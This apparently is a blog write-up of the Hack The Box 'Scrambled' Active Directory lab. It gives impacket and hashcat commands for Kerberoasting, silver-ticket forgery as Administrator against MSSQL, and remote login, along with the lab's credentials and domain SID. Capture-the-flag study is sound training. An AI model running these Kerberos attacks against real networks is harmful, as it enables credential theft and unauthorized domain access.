Scrambled - HTB

This is an Active Directory box based on the ports open.

Navigate to the supportrequest page. We see two potential users exist: support and ksimpson. The domain scramblecorp.com can be added to the /etc/hosts file too.

The username and password is ksimpson/ksimpson.

We see NTLM is disabled based on this hard-to-read and easily-missed notification message.

GetUserSPN.py is broken. Please fix with a local copy: https://github.com/SecureAuthCorp/impacket/issues/1206

impacket-getTGT scrm.local/ksimpson:ksimpson
export KRB5CCNAME=ksimpson.ccache
so impacket can use the ticket.
hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt 

The password is pegasus60. Which fits for UCF right.

Get a PDF document from samba. We can pass the ksimpson TGT ticket to login.

smbclient.py scrm.local/ksimpson:ksimpson@dc1.scrm.local -dc-ip scrambled.htb -debug -k

Next lets use ticketer.py. https://www.browserling.com/tools/ntlm-hash. Take Pegasus60 and get a NTLM hash. We need the Domain SID, NTLM hash.

getPac.py -targetUser ksimpson scrm.local/ksimpson:ksimpson 
ticketer.py -nthash B999A16500B87D17EC7F2E2A68778F05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local -spn MSSQLSvc/dc1.scrm.local -user-id 500 Administrator
export KRB5CCNAME=Administrator.ccache 
impacket-mssqlclient scrm.local/Administrator:@dc1.scrm.local -dc-ip dc1.scrm.local -no-pass -k

Use win-rm to login as MiscSvc/ScrambledEggs9900

Comments

Popular posts from this blog

HTB - Jarvis MySQL

Palo Alto for GNS3 CCDC Tutorial

Trace Labs Global Missing Persons CTF V